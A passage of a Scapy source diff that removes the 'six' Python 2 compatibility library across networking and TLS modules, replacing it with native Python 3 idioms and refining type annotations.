then check all the available ifaces as backup. for ifname in itertools.chain(ifaces, conf.ifaces.values()): - iface = resolve_iface(ifname) + iface = resolve_iface(ifname) # type: ignore if iface.is_valid(): return iface # There is no hope left diff --git a/scapy/layers/all.py b/scapy/layers/all.py index 57ce00a2c01..58b9a8bf679 100644 --- a/scapy/layers/all.py +++ b/scapy/layers/all.py @@ -8,15 +8,15 @@ """ +import builtins +import logging + # We import conf from arch to make sure arch specific layers are populated from scapy.arch import conf from scapy.error import log_loading from scapy.main import load_layer -import logging -import scapy.libs.six as six - -ignored = list(six.moves.builtins.__dict__) + ["sys"] +ignored = list(builtins.__dict__) + ["sys"] log = logging.getLogger("scapy.loading") __all__ = [] diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 293914a5b0f..c98661eb712 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -50,7 +50,6 @@ from scapy.error import warning from scapy.utils import lhex, mac2str, str2mac from scapy.volatile import RandMAC -from scapy.libs import six ########## @@ -75,7 +74,7 @@ def m2i(self, pkt, x): return str2mac(x[::-1]) def any2i(self, pkt, x): - if isinstance(x, (six.binary_type, six.text_type)) and len(x) == 6: + if isinstance(x, (bytes, str)) and len(x) == 6: x = self.m2i(pkt, x) return x @@ -859,8 +858,9 @@ def register_magic_payload(cls, payload_cls, magic_check=None): cls.registered_magic_payloads[payload_cls] = magic_check def default_payload_class(self, payload): - for cls, check in six.iteritems( - EIR_Manufacturer_Specific_Data.registered_magic_payloads): + for cls, check in ( + EIR_Manufacturer_Specific_Data.registered_magic_payloads.items() + ): if check(payload): return cls diff --git a/scapy/layers/can.py b/scapy/layers/can.py index 0811c8bf29f..11ec477f75f 100644 --- a/scapy/layers/can.py +++ b/scapy/layers/can.py @@ -16,7 +16,6 @@ from scapy.compat import Tuple, Optional, Type, List, Union, Callable, IO, \ Any, cast, hex_bytes -import scapy.libs.six as six from scapy.config import conf from scapy.compat import orb from scapy.data import DLT_CAN_SOCKETCAN @@ -517,10 +516,10 @@ def __init__(self, filename, interface=None): self.filename, self.f = self.open(filename) self.ifilter = None # type: Optional[List[str]] if interface is not None: - if isinstance(interface, six.string_types): + if isinstance(interface, str): self.ifilter = [interface] else: - self.ifilter = cast(List[str], interface) + self.ifilter = interface def __iter__(self): # type: () -> CandumpReader diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index 710c8d20aac..8caf6857fb3 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -91,8 +91,6 @@ EPacketListField, ) -import scapy.libs.six as six - # DCE/RPC Packet DCE_RPC_TYPE = { @@ -1010,8 +1008,7 @@ def __new__(cls, name, bases, dct): return newcls # type: ignore -@six.add_metaclass(_NDRPacketMetaclass) -class NDRPacket(_NDRPacket): +class NDRPacket(_NDRPacket, metaclass=_NDRPacketMetaclass): """ A NDR Packet. Handles pointer size & endianness """ diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index 405545ea1b4..b3a03596455 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -57,7 +57,6 @@ from scapy.arch import get_if_raw_hwaddr from scapy.sendrecv import srp1, sendp from scapy.error import warning -import scapy.libs.six as six from scapy.config import conf dhcpmagic = b"c\x82Sc" @@ -352,7 +351,7 @@ def randval(self): DHCPRevOptions = {} -for k, v in six.iteritems(DHCPOptions): +for k, v in DHCPOptions.items(): if isinstance(v, str): n = v v = None @@ -372,7 +371,7 @@ def __init__(self, size=None, rndstr=None): if rndstr is None: rndstr = RandBin(RandNum(0, 255)) self.rndstr = rndstr - self._opts = list(six.itervalues(DHCPOptions)) + self._opts = list(DHCPOptions.values()) self._opts.remove("pad") self._opts.remove("end") @@ -612,7 +611,7 @@ def parse_options(self, self.broadcast = ltoa(atol(self.network) | (0xffffffff & ~msk)) self.gw = gw self.nameserver = nameserver or gw - if isinstance(pool, six.string_types): + if isinstance(pool, str): pool = Net(pool) if isinstance(pool, Iterable): pool = [k for k in pool if k not in [gw, self.network, self.broadcast]] diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index acc15db768a..a1109efae88 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -34,7 +34,6 @@ from scapy.pton_ntop import inet_pton from scapy.themes import Color from scapy.utils6 import in6_addrtovendor, in6_islladdr -import scapy.libs.six as six ############################################################################# # Helpers ## @@ -1716,14 +1715,14 @@ def _include_options(query, answer): reqopts = [] if query.haslayer(DHCP6OptOptReq): # add only asked ones reqopts = query[DHCP6OptOptReq].reqopts - for o, opt in six.iteritems(self.dhcpv6_options): + for o, opt in self.dhcpv6_options.items(): if o in reqopts: answer /= opt else: # advertise everything we have available # Should not happen has clients MUST include # and ORO in requests (sec 18.1.1) -- arno - for o, opt in six.iteritems(self.dhcpv6_options): + for o, opt in self.dhcpv6_options.items(): answer /= opt if msgtype == 1: # SOLICIT (See Sect 17.1 and 17.2 of RFC 3315) @@ -1865,7 +1864,7 @@ def _include_options(query, answer): resp /= DHCP6OptClientId(duid=client_duid) # Stack requested options if available - for o, opt in six.iteritems(self.dhcpv6_options): + for o, opt in self.dhcpv6_options.items(): resp /= opt return resp diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index a229a043bf6..8196cf37b02 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -29,7 +29,6 @@ from scapy.layers.inet import IP, DestIPField, IPField, UDP, TCP from scapy.layers.inet6 import IPv6, DestIP6Field, IP6Field -import scapy.libs.six as six from scapy.compat import ( @@ -1025,7 +1024,7 @@ class DNSRRTSIG(_DNSRRdummy): 32769: DNSRRDLV, # RFC 4431 } -DNSSEC_CLASSES = tuple(six.itervalues(DNSRR_DISPATCHER)) +DNSSEC_CLASSES = tuple(DNSRR_DISPATCHER.values()) def isdnssecRR(obj): diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 5dcc70431d7..6b0e64dcdc4 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -60,8 +60,6 @@ import scapy.as_resolvers -import scapy.libs.six as six - #################### # IP Tools class # #################### @@ -350,7 +348,7 @@ def _fix(self): # Random ("NAME", fmt) rand_patterns = [ random.choice(list( - (opt, fmt) for opt, fmt in six.itervalues(TCPOptions[0]) + (opt, fmt) for opt, fmt in TCPOptions[0].values() if opt != 'EOL' )) for _ in range(self.size) @@ -1243,7 +1241,7 @@ def _defrag_logic(plist, complete=False): defrag = [] missfrag = [] - for lst in six.itervalues(frags): + for lst in frags.values(): lst.sort(key=lambda x: x.frag) _defrag_list(lst, defrag, missfrag) defrag2 = [] @@ -1364,9 +1362,9 @@ def get_trace(self): if d not in trace: trace[d] = {} trace[d][s[IP].ttl] = r[IP].src, ICMP not in r - for k in six.itervalues(trace): + for k in trace.values(): try: - m = min(x for x, y in six.iteritems(k) if y[1]) + m = min(x for x, y in k.items() if y[1]) except ValueError: continue for li in list(k): # use list(): k is modified in the loop @@ -1497,12 +1495,12 @@ def action(self): s = IPsphere(pos=vpython.vec((tmp_len - 1) * vpython.cos(2 * i * vpython.pi / tmp_len), (tmp_len - 1) * vpython.sin(2 * i * vpython.pi / tmp_len), 2 * t), # noqa: E501 ip=r[i][0], color=col) - for trlst in six.itervalues(tr3d): + for trlst in tr3d.values(): if t <= len(trlst): if trlst[t - 1] == i: trlst[t - 1] = s forecol = colgen(0.625, 0.4375, 0.25, 0.125) - for trlst in six.itervalues(tr3d): + for trlst in tr3d.values(): col = vpython.vec(*next(forecol)) start = vpython.vec(0, 0, 0) for ip in trlst: @@ -1639,7 +1637,7 @@ def world_trace(self): lines = [] # Split traceroute measurement - for key, trc in six.iteritems(trt): + for key, trc in trt.items(): # Get next color color = next(colors_cycle) # Gather mesurments data diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 244e678aab8..5772ef3a667 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -42,7 +42,6 @@ from scapy.layers.inet import IP, IPTools, TCP, TCPerror, TracerouteResult, \ UDP, UDPerror from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP -import scapy.libs.six as six from scapy.packet import bind_layers, Packet, Raw from scapy.sendrecv import sendp, sniff, sr, srp1 from scapy.supersocket import SuperSocket @@ -2510,7 +2509,7 @@ def h2i(self, pkt, x): x = [x] if isinstance(x, list): x = [val.encode() if isinstance(val, str) else val for val in x] # noqa: E501 - if x and isinstance(x[0], six.integer_types): + if x and isinstance(x[0], int): ttl = x[0] names = x[1:] else: @@ -2528,7 +2527,7 @@ def fixvalue(x): if not isinstance(x, tuple): x = (0, x) # Decode bytes - if six.PY3 and isinstance(x[1], bytes): + if isinstance(x[1], bytes): x = (x[0], x[1].decode()) return x @@ -3327,9 +3326,9 @@ def get_trace(self): trace[d][s[IPv6].hlim] = r[IPv6].src, t - for k in six.itervalues(trace): + for k in trace.values(): try: - m = min(x for x, y in six.iteritems(k) if y[1]) + m = min(x for x, y in k.items() if y[1]) except ValueError: continue for li in list(k): # use list(): k is modified in the loop diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index 5305f2604a1..ecdc14af960 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -63,7 +63,6 @@ bind_top_down, ) from scapy.layers.inet import IP, UDP -import scapy.libs.six as six from scapy.layers.inet6 import IPv6, IPv6ExtHdrHopByHop, IPv6ExtHdrDestOpt, \ IPv6ExtHdrRouting @@ -943,10 +942,10 @@ def __init__(self, proto, spi, seq_num=1, crypt_algo=None, crypt_key=None, :param esn: extended sequence number (32 MSB) """ - if proto not in (ESP, AH, ESP.name, AH.name): + if proto not in {ESP, AH, ESP.name, AH.name}: raise ValueError("proto must be either ESP or AH") - if isinstance(proto, six.string_types): - self.proto = eval(proto) + if isinstance(proto, str): + self.proto = {ESP.name: ESP, AH.name: AH}[proto] else: self.proto = proto diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index e6679ce6f4d..0fd1f0e23e5 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -51,7 +51,6 @@ XShortField, ) from scapy.interfaces import _GlobInterfaceType -from scapy.libs.six import viewitems from scapy.packet import bind_layers, Packet from scapy.plist import ( PacketList, @@ -98,7 +97,7 @@ def register_l3(self, l2, l3, resolve_method): self.resolvers[l2, l3] = resolve_method def resolve(self, l2inst, l3inst): - # type: (Ether, Packet) -> Optional[str] + # type: (Packet, Packet) -> Optional[str] k = l2inst.__class__, l3inst.__class__ if k in self.resolvers: return self.resolvers[k](l2inst, l3inst) @@ -161,7 +160,7 @@ def __init__(self, name): MACField.__init__(self, name, None) def i2h(self, pkt, x): - # type: (Optional[Ether], Optional[str]) -> str + # type: (Optional[Packet], Optional[str]) -> str if x is None and pkt is not None: try: x = conf.neighbor.resolve(pkt, pkt.payload) @@ -176,8 +175,8 @@ def i2h(self, pkt, x): return super(DestMACField, self).i2h(pkt, x) def i2m(self, pkt, x): - # type: (Optional[Ether], Optional[str]) -> bytes - return MACField.i2m(self, pkt, self.i2h(pkt, x)) + # type: (Optional[Packet], Optional[str]) -> bytes + return super(DestMACField, self).i2m(pkt, self.i2h(pkt, x)) class SourceMACField(MACField): @@ -204,8 +203,8 @@ def i2h(self, pkt, x): return super(SourceMACField, self).i2h(pkt, x) def i2m(self, pkt, x): - # type: (Optional[Ether], Optional[Any]) -> bytes - return MACField.i2m(self, pkt, self.i2h(pkt, x)) + # type: (Optional[Packet], Optional[Any]) -> bytes + return super(SourceMACField, self).i2m(pkt, self.i2h(pkt, x)) # Layers @@ -281,7 +280,7 @@ def extract_padding(self, s): return s[:tmp_len], s[tmp_len:] def answers(self, other): - # type: (Ether) -> int + # type: (Packet) -> int if isinstance(other, Dot3): return self.payload.answers(other.payload) return 0 @@ -770,7 +769,7 @@ def arpcachepoison( couple_list = [addresses] else: couple_list = addresses - p = [ + p: List[Packet] = [ Ether(src=y, dst="ff:ff:ff:ff:ff:ff" if broadcast else None) / ARP(op="who-has", psrc=x, pdst=targets, hwsrc=y, hwdst="00:00:00:00:00:00") @@ -1023,7 +1022,7 @@ def parse_options(self, IP_addr=None, ARP_addr=None, from_ip=None): self.ARP_addr = ARP_addr def is_request(self, req): - # type: (Ether) -> bool + # type: (Packet) -> bool if not req.haslayer(ARP): return False arp = req[ARP] @@ -1088,7 +1087,7 @@ def arpleak(target, plen=255, hwlen=255, **kargs): """ # We want explicit packets - pkts_iface = {} # type: Dict[str, List[Ether]] + pkts_iface = {} # type: Dict[str, List[Packet]] for pkt in ARP(pdst=target): # We have to do some of Scapy's work since we mess with # important values @@ -1110,7 +1109,7 @@ def arpleak(target, plen=255, hwlen=255, **kargs): Ether(src=hwsrc, dst=ETHER_BROADCAST) / pkt ) ans, unans = SndRcvList(), PacketList(name="Unanswered") - for iface, pkts in viewitems(pkts_iface): + for iface, pkts in pkts_iface.items(): ans_new, unans_new = srp(pkts, iface=iface, filter="arp", **kargs) ans += ans_new unans += unans_new diff --git a/scapy/layers/lltd.py b/scapy/layers/lltd.py index 38384db04dc..09bb40ffbc5 100644 --- a/scapy/layers/lltd.py +++ b/scapy/layers/lltd.py @@ -21,7 +21,6 @@ from scapy.layers.inet import IPField from scapy.layers.inet6 import IP6Field from scapy.data import ETHER_ANY -import scapy.libs.six as six from scapy.compat import orb, chb @@ -298,7 +297,7 @@ def dispatch_hook(cls, _pkt=None, *_, **kargs): cmd = orb(_pkt[0]) elif "type" in kargs: cmd = kargs["type"] - if isinstance(cmd, six.string_types): + if isinstance(cmd, str): cmd = cls.fields_desc[0].s2i[cmd] else: return cls @@ -841,4 +840,4 @@ def get_data(self): """ return {key: "".join(chr(byte) for byte in data) - for key, data in six.iteritems(self.data)} + for key, data in self.data.items()} diff --git a/scapy/layers/ntp.py b/scapy/layers/ntp.py index 9c6620b7022..3c99e81ac9b 100644 --- a/scapy/layers/ntp.py +++ b/scapy/layers/ntp.py @@ -24,7 +24,6 @@ from scapy.utils import lhex from scapy.compat import orb from scapy.config import conf -import scapy.libs.six as six ############################################################################# @@ -84,7 +83,7 @@ def i2repr(self, pkt, val): ) def any2i(self, pkt, val): - if isinstance(val, six.string_types): + if isinstance(val, str): val = int(time.mktime(time.strptime(val))) + _NTP_BASETIME elif isinstance(val, datetime.datetime): val = int(val.strftime("%s")) + _NTP_BASETIME diff --git a/scapy/layers/ppp.py b/scapy/layers/ppp.py index e38c1677d31..b5cd42b46ec 100644 --- a/scapy/layers/ppp.py +++ b/scapy/layers/ppp.py @@ -38,7 +38,6 @@ XShortField, XStrLenField, ) -from scapy.libs import six class PPPoE(Packet): @@ -753,7 +752,7 @@ def dispatch_hook(cls, _pkt=None, *_, **kargs): code = orb(_pkt[0]) elif "code" in kargs: code = kargs["code"] - if isinstance(code, six.string_types): + if isinstance(code, str): code = cls.fields_desc[0].s2i[code] if code == 1: @@ -834,7 +833,7 @@ def dispatch_hook(cls, _pkt=None, *_, **kargs): code = orb(_pkt[0]) elif "code" in kargs: code = kargs["code"] - if isinstance(code, six.string_types): + if isinstance(code, str): code = cls.fields_desc[0].s2i[code] if code in (1, 2): diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index cd1e93b88b8..e5d5b2465bd 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -71,7 +71,6 @@ _tls_cipher_suites_cls from scapy.layers.tls.crypto.groups import _tls_named_groups from scapy.layers.tls.crypto.hkdf import TLS13_HKDF -from scapy.libs import six from scapy.packet import Raw from scapy.compat import bytes_encode @@ -140,7 +139,7 @@ def parse_args(self, server="127.0.0.1", dport=4433, server_name=None, self.linebreak = False if isinstance(data, bytes): self.data_to_send = [data] - elif isinstance(data, six.string_types): + elif isinstance(data, str): self.data_to_send = [bytes_encode(data)] elif isinstance(data, list): self.data_to_send = list(bytes_encode(d) for d in reversed(data)) @@ -590,7 +589,7 @@ def add_ClientData(self): raise self.ADDED_CLIENTDATA() raise self.WAITING_SERVERDATA() else: - data = six.moves.input().replace('\\r', '\r').replace('\\n', '\n').encode() # noqa: E501 + data = input().replace('\\r', '\r').replace('\\n', '\n').encode() else: data = self.data_to_send.pop() if data == b"quit": @@ -928,7 +927,7 @@ def SSLv2_WAITING_CLIENTDATA(self): @ATMT.condition(SSLv2_WAITING_CLIENTDATA, prio=1) def sslv2_add_ClientData(self): if not self.data_to_send: - data = six.moves.input().replace('\\r', '\r').replace('\\n', '\n').encode() # noqa: E501 + data = input().replace('\\r', '\r').replace('\\n', '\n').encode() else: data = self.data_to_send.pop() self.vprint("> Read from list: %s" % data) diff --git a/scapy/layers/tls/basefields.py b/scapy/layers/tls/basefields.py index 6c4dc711cbe..2862c896e0a 100644 --- a/scapy/layers/tls/basefields.py +++ b/scapy/layers/tls/basefields.py @@ -11,7 +11,6 @@ import struct from scapy.fields import ByteField, ShortEnumField, ShortField, StrField -import scapy.libs.six as six from scapy.compat import orb _tls_type = {20: "change_cipher_spec", @@ -168,8 +167,10 @@ def addfield(self, pkt, s, val): return s def getfield(self, pkt, s): - if (pkt.tls_session.rcs.cipher.type != "aead" and - False in six.itervalues(pkt.tls_session.rcs.cipher.ready)): + if ( + pkt.tls_session.rcs.cipher.type != "aead" and + False in pkt.tls_session.rcs.cipher.ready.values() + ): # XXX Find a more proper way to handle the still-encrypted case return s, b"" tmp_len = pkt.tls_session.rcs.mac_len diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index 66af9d6d4f9..5eab98fb04a 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -32,7 +32,6 @@ import time from scapy.config import conf, crypto_validator -import scapy.libs.six as six from scapy.error import warning from scapy.utils import binrepr from scapy.asn1.asn1 import ASN1_BIT_STRING @@ -239,7 +238,7 @@ def __call__(cls, key_path=None): return obj -class PubKey(six.with_metaclass(_PubKeyFactory, object)): +class PubKey(metaclass=_PubKeyFactory): """ Parent class for both PubKeyRSA and PubKeyECDSA. Provides a common verifyCert() method. @@ -413,7 +412,7 @@ def __bytes__(self): __str__ = __bytes__ -class PrivKey(six.with_metaclass(_PrivKeyFactory, object)): +class PrivKey(metaclass=_PrivKeyFactory): """ Parent class for both PrivKeyRSA and PrivKeyECDSA. Provides common signTBSCert() and resignCert() methods. @@ -568,7 +567,7 @@ def __call__(cls, cert_path): return obj -class Cert(six.with_metaclass(_CertMaker, object)): +class Cert(metaclass=_CertMaker): """ Wrapper for the X509_Cert from layers/x509.py. Use the 'x509Cert' attribute to access original object. @@ -757,7 +756,7 @@ def __call__(cls, cert_path): return obj -class CRL(six.with_metaclass(_CRLMaker, object)): +class CRL(metaclass=_CRLMaker): """ Wrapper for the X509_CRL from layers/x509.py. Use the 'x509CRL' attribute to access original object. diff --git a/scapy/layers/tls/crypto/cipher_aead.py b/scapy/layers/tls/crypto/cipher_aead.py index 36a5945379e..b83ddccbe66 100644 --- a/scapy/layers/tls/crypto/cipher_aead.py +++ b/scapy/layers/tls/crypto/cipher_aead.py @@ -19,7 +19,6 @@ from scapy.layers.tls.crypto.pkcs1 import pkcs_i2osp, pkcs_os2ip from scapy.layers.tls.crypto.common import CipherError from scapy.utils import strxor -import scapy.libs.six as six if conf.crypto_valid: from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes # noqa: E501 @@ -57,7 +56,7 @@ class AEADTagError(Exception): pass -class _AEADCipher(six.with_metaclass(_AEADCipherMetaclass, object)): +class _AEADCipher(metaclass=_AEADCipherMetaclass): """ The hasattr(self, "pc_cls") tests correspond to the legacy API of the crypto library. With cryptography v2.0, both CCM and GCM should follow @@ -144,7 +143,7 @@ def auth_encrypt(self, P, A, seq_num=None): because one cipher (ChaCha20Poly1305) using TLS 1.2 logic in record.py actually is a _AEADCipher_TLS13 (even though others are not). """ - if False in six.itervalues(self.ready): + if False in self.ready.values(): raise CipherError(P, A) if hasattr(self, "pc_cls"): @@ -184,7 +183,7 @@ def auth_decrypt(self, A, C, seq_num=None, add_length=True): C[self.nonce_explicit_len:-self.tag_len], C[-self.tag_len:]) - if False in six.itervalues(self.ready): + if False in self.ready.values(): raise CipherError(nonce_explicit_str, C, mac) self.nonce_explicit = pkcs_os2ip(nonce_explicit_str) @@ -247,7 +246,7 @@ class Cipher_AES_256_CCM_8(Cipher_AES_128_CCM_8): key_len = 32 -class _AEADCipher_TLS13(six.with_metaclass(_AEADCipherMetaclass, object)): +class _AEADCipher_TLS13(metaclass=_AEADCipherMetaclass): """ The hasattr(self, "pc_cls") enable support for the legacy implementation of GCM in the cryptography library. They should not be used, and might @@ -316,7 +315,7 @@ def auth_encrypt(self, P, A, seq_num): Note that the cipher's authentication tag must be None when encrypting. """ - if False in six.itervalues(self.ready): + if False in self.ready.values(): raise CipherError(P, A) if hasattr(self, "pc_cls"): @@ -342,7 +341,7 @@ def auth_decrypt(self, A, C, seq_num): raise a CipherError which contains the encrypted input. """ C, mac = C[:-self.tag_len], C[-self.tag_len:] - if False in six.itervalues(self.ready): + if False in self.ready.values(): raise CipherError(C, mac) if hasattr(self, "pc_cls"): diff --git a/scapy/layers/tls/crypto/cipher_block.py b/scapy/layers/tls/crypto/cipher_block.py index c4f73ced6a0..c2462aebd00 100644 --- a/scapy/layers/tls/crypto/cipher_block.py +++ b/scapy/layers/tls/crypto/cipher_block.py @@ -12,7 +12,6 @@ from scapy.config import conf from scapy.layers.tls.crypto.common import CipherError -import scapy.libs.six as six if conf.crypto_valid: from cryptography.utils import ( @@ -43,7 +42,7 @@ def __new__(cls, ciph_name, bases, dct): return the_class -class _BlockCipher(six.with_metaclass(_BlockCipherMetaclass, object)): +class _BlockCipher(metaclass=_BlockCipherMetaclass): type = "block" def __init__(self, key=None, iv=None): @@ -83,7 +82,7 @@ def encrypt(self, data): Encrypt the data. Also, update the cipher iv. This is needed for SSLv3 and TLS 1.0. For TLS 1.1/1.2, it is overwritten in TLS.post_build(). """ - if False in six.itervalues(self.ready): + if False in self.ready.values(): raise CipherError(data) encryptor = self._cipher.encryptor() tmp = encryptor.update(data) + encryptor.finalize() @@ -96,7 +95,7 @@ def decrypt(self, data): and TLS 1.0. For TLS 1.1/1.2, it is overwritten in TLS.pre_dissect(). If we lack the key, we raise a CipherError which contains the input. """ - if False in six.itervalues(self.ready): + if False in self.ready.values(): raise CipherError(data) decryptor = self._cipher.decryptor() tmp = decryptor.update(data) + decryptor.finalize() diff --git a/scapy/layers/tls/crypto/cipher_stream.py b/scapy/layers/tls/crypto/cipher_stream.py index c6424b7d7a1..bbd6bbd07a5 100644 --- a/scapy/layers/tls/crypto/cipher_stream.py +++ b/scapy/layers/tls/crypto/cipher_stream.py @@ -10,7 +10,6 @@ from scapy.config import conf from scapy.layers.tls.crypto.common import CipherError -import scapy.libs.six as six if conf.crypto_valid: from cryptography.hazmat.primitives.ciphers import Cipher, algorithms @@ -35,7 +34,7 @@ def __new__(cls, ciph_name, bases, dct): return the_class -class _StreamCipher(six.with_metaclass(_StreamCipherMetaclass, object)): +class _StreamCipher(metaclass=_StreamCipherMetaclass): type = "stream" def __init__(self, key=None): @@ -81,13 +80,13 @@ def __setattr__(self, name, val): super(_StreamCipher, self).__setattr__(name, val) def encrypt(self, data): - if False in six.itervalues(self.ready): + if False in self.ready.values(): raise CipherError(data) self._enc_updated_with += data return self.encryptor.update(data) def decrypt(self, data): - if False in six.itervalues(self.ready): + if False in self.ready.values(): raise CipherError(data) self._dec_updated_with += data return self.decryptor.update(data) diff --git a/scapy/layers/tls/crypto/compression.py b/scapy/layers/tls/crypto/compression.py index c80983da59e..0c92233d851 100644 --- a/scapy/layers/tls/crypto/compression.py +++ b/scapy/layers/tls/crypto/compression.py @@ -11,7 +11,6 @@ import zlib from scapy.error import warning -import scapy.libs.six as six _tls_compression_algs = {} @@ -33,7 +32,7 @@ def __new__(cls, name, bases, dct): return the_class -class _GenericComp(six.with_metaclass(_GenericCompMetaclass, object)): +class _GenericComp(metaclass=_GenericCompMetaclass): pass diff --git a/scapy/layers/tls/crypto/groups.py b/scapy/layers/tls/crypto/groups.py index fcb71b1b0ce..2730b8ef985 100644 --- a/scapy/layers/tls/crypto/groups.py +++ b/scapy/layers/tls/crypto/groups.py @@ -18,7 +18,6 @@ from scapy.compat import bytes_int, int_bytes from scapy.error import warning from scapy.utils import long_converter -import scapy.libs.six as six if conf.crypto_valid: from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives.asymmetric import dh, ec @@ -41,11 +40,11 @@ def DHParameterNumbers__init__hack(self, p, g, q=None): if ( - not isinstance(p, six.integer_types) or - not isinstance(g, six.integer_types) + not isinstance(p, int) or + not isinstance(g, int) ): raise TypeError("p and g must be integers") - if q is not None and not isinstance(q, six.integer_types): + if q is not None and not isinstance(q, int): raise TypeError("q must be integer or None") self._p = p @@ -71,7 +70,7 @@ def __new__(cls, ffdh_name, bases, dct): return the_class -class _FFDHParams(six.with_metaclass(_FFDHParamsMetaclass)): +class _FFDHParams(metaclass=_FFDHParamsMetaclass): pass diff --git a/scapy/layers/tls/crypto/h_mac.py b/scapy/layers/tls/crypto/h_mac.py index ba8c6c9f13b..3d3206ed4f7 100644 --- a/scapy/layers/tls/crypto/h_mac.py +++ b/scapy/layers/tls/crypto/h_mac.py @@ -11,7 +11,6 @@ import hmac from scapy.layers.tls.crypto.hash import _tls_hash_algs -import scapy.libs.six as six from scapy.compat import bytes_encode _SSLv3_PAD1_MD5 = b"\x36" * 48 @@ -52,7 +51,7 @@ class HMACError(Exception): pass -class _GenericHMAC(six.with_metaclass(_GenericHMACMetaclass, object)): +class _GenericHMAC(metaclass=_GenericHMACMetaclass): def __init__(self, key=None): if key is None: self.key = b"" diff --git a/scapy/layers/tls/crypto/hash.py b/scapy/layers/tls/crypto/hash.py index c6cb68e2427..b1bcdbe2669 100644 --- a/scapy/layers/tls/crypto/hash.py +++ b/scapy/layers/tls/crypto/hash.py @@ -11,8 +11,6 @@ from hashlib import md5, sha1, sha224, sha256, sha384, sha512 from scapy.layers.tls.crypto.md4 import MD4 as md4 -import scapy.libs.six as six - _tls_hash_algs = {} @@ -32,7 +30,7 @@ def __new__(cls, hash_name, bases, dct): return the_class -class _GenericHash(six.with_metaclass(_GenericHashMetaclass, object)): +class _GenericHash(metaclass=_GenericHashMetaclass): def digest(self, tbd): return self.hash_cls(tbd).digest() diff --git a/scapy/layers/tls/crypto/kx_algs.py b/scapy/layers/tls/crypto/kx_algs.py index 3cff25fc39a..cd1dbec9c1d 100644 --- a/scapy/layers/tls/crypto/kx_algs.py +++ b/scapy/layers/tls/crypto/kx_algs.py @@ -16,7 +16,6 @@ ClientECDiffieHellmanPublic, _tls_server_ecdh_cls_guess, EncryptedPreMasterSecret) -import scapy.libs.six as six _tls_kx_algs = {} @@ -41,7 +40,7 @@ def __new__(cls, kx_name, bases, dct): return the_class -class _GenericKX(six.with_metaclass(_GenericKXMetaclass)): +class _GenericKX(metaclass=_GenericKXMetaclass): pass diff --git a/scapy/layers/tls/crypto/pkcs1.py b/scapy/layers/tls/crypto/pkcs1.py index 6a4b8d7dba4..18008a5e7d8 100644 --- a/scapy/layers/tls/crypto/pkcs1.py +++ b/scapy/layers/tls/crypto/pkcs1.py @@ -13,7 +13,6 @@ """ from scapy.compat import bytes_encode, hex_bytes, bytes_hex -import scapy.libs.six as six from scapy.config import conf, crypto_validator from scapy.error import warning @@ -169,9 +168,7 @@ def _legacy_verify_md5_sha1(self, M, S): return False s = pkcs_os2ip(S) n = self._modulus - if isinstance(s, int) and six.PY2: - s = long(s) # noqa: F821 - if (six.PY2 and not isinstance(s, long)) or s > n - 1: # noqa: F821 + if s > n - 1: warning("Key._rsaep() expects a long between 0 and n-1") return None m = pow(s, self._pubExp, n) @@ -214,9 +211,7 @@ def _legacy_sign_md5_sha1(self, M): return None m = pkcs_os2ip(EM) n = self._modulus - if isinstance(m, int) and six.PY2: - m = long(m) # noqa: F821 - if (six.PY2 and not isinstance(m, long)) or m > n - 1: # noqa: F821 + if m > n - 1: warning("Key._rsaep() expects a long between 0 and n-1") return None privExp = self.key.private_numbers().d diff --git a/scapy/layers/tls/crypto/suites.py b/scapy/layers/tls/crypto/suites.py index 329d42b9329..f7079384d42 100644 --- a/scapy/layers/tls/crypto/suites.py +++ b/scapy/layers/tls/crypto/suites.py @@ -15,7 +15,6 @@ from scapy.layers.tls.crypto.hash import _tls_hash_algs from scapy.layers.tls.crypto.h_mac import _tls_hmac_algs from scapy.layers.tls.crypto.ciphers import _tls_cipher_algs -import scapy.libs.six as six def get_algs_from_ciphersuite_name(ciphersuite_name): @@ -126,7 +125,7 @@ def __new__(cls, cs_name, bases, dct): return the_class -class _GenericCipherSuite(six.with_metaclass(_GenericCipherSuiteMetaclass, object)): # noqa: E501 +class _GenericCipherSuite(metaclass=_GenericCipherSuiteMetaclass): def __init__(self, tls_version=0x0303): """ Most of the attributes are fixed and have already been set by the diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 72d7d399837..eeffad947bb 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -36,7 +36,6 @@ from scapy.compat import hex_bytes, orb, raw from scapy.config import conf -from scapy.libs import six from scapy.packet import Packet, Raw, Padding from scapy.utils import randstring, repr_hex from scapy.layers.x509 import OCSP_Response @@ -179,7 +178,7 @@ def __init__(self, name, default, dico, length_from=None, itemfmt="!H"): self.itemsize = struct.calcsize(itemfmt) i2s = self.i2s = {} s2i = self.s2i = {} - for k in six.iterkeys(dico): + for k in dico.keys(): i2s[k] = dico[k] s2i[dico[k]] = k diff --git a/scapy/layers/tls/keyexchange_tls13.py 